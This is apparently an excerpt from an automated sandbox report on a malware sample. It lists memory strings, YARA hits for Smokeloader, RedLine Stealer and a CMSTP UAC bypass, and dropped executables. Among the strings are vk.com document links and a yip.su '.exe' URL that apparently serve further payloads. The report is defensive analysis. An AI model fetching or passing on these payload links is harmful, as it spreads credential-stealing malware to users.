                  Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org
                  Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/browser_reports?dest=default_reports
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZFK5
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzKL04
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TPX72
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXn
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGi
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZ
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzK
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TP
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQ
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsEC
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/doc863235369_679548730?hash=VLR7cQ444BmBjXLp6la3lUFGFg05ZJB7nkcmssw9Kvz&dl=1NJlbpp
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.ru
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000024.00000000.1419179675.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                  Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000024.00000000.1373594900.00000000071B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.drString found in binary or memory: https://yip.su/RNWPd
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.drString found in binary or memory: https://yip.su/redirect-

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe entropy: 7.99633338896Jump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\Pictures\360TS_Setup.exe.P2P entropy: 7.99475810581Jump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\Pictures\360TS_Setup.exe (copy) entropy: 7.99475810581Jump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe entropy: 7.99695778151Jump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe entropy: 7.99695778151Jump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe entropy: 7.99904461084Jump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe entropy: 7.99904461084Jump to dropped file

                  System Summary

                  barindex
                  Source: lgX7lgUL1w.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name:
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name:
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name:
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name:
                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name:
                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name:
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name:
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name:
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name:
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name:
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name:
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name:
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name:
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name:
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name:
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name:
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name:
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name:
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name:
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name:
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name:
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name:
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name:
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name:
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name:
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name:
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401615 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401615
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401658 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401658
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,8_2_00403406
